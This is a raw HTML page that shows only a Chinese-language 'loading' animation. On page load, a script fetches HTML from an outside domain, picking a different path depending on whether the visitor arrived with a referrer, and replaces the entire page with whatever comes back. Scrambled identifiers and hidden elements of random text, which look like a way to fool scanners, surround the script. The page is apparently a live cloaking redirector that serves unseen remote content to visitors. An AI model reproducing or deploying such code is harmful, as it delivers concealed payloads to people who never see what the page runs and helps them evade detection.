<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .QeKr5kC {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .QeKr5kC .NKZKAY6LUSx {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .QeKr5kC .content {
            line-height: 50px;
            text-align: center
        }

        .QeKr5kC .img {
            width: 100%
        }

        .QeKr5kC .J6Mbi969 {
            text-align: center
        }

        .QeKr5kC .J6Mbi969 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .QeKr5kC .J6Mbi969 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .QeKr5kC .J6Mbi969 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .QeKr5kC .J6Mbi969 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .QeKr5kC .J6Mbi969 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .QeKr5kC .J6Mbi969 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .QeKr5kC .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function D7mXM8s2k7(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var wEhEOC = D7mXM8s2k7('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ wEhEOC +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ wEhEOC +".html?a=share";
		}
		
        MWHeyu=url+"#"+new Date().getTime();
        MWHeyu && function() {
            $.get(MWHeyu, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >v3V3S5P3EgABU7hB3Uei5jE3jdohDoowlF5a</ul>
<p  style='display:none'>rKGRoHWexNDAeQhABJSjNfCyML2j6SRtygOkqebGTl3g10WkP</p>
<li style='display:none' >NSxI7q0W7bqSkHOCEVcGMQtcBjlldFgl</li>
<b style='display:none' >ZbDz3QkftsY8EeejkapQ5xSIg9fhhP5GjU</b><div class="QeKr5kC">
    <div class="NKZKAY6LUSx">
        <div class="J6Mbi969">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>AeREuLSkwcy7h5LTNXQMsl6c9vb8NwvLx4o28kyC2P4r3bYUdseiWQMbTQ0vqVqBEgj</span>
<img  src='' style='display:none'>
<h1 style='display:none' >rSORIqojyIYTTbWhDpTL0aj0XbkP7DdPz8vx90lmFS5cL9M</h1>
<ul style='display:none' >GGQemAofLUOQKtZjw5p8THd6HqlQGE1WReAaYfiHREX2SFS0NueRShcAiMI3H</ul></body>
</html>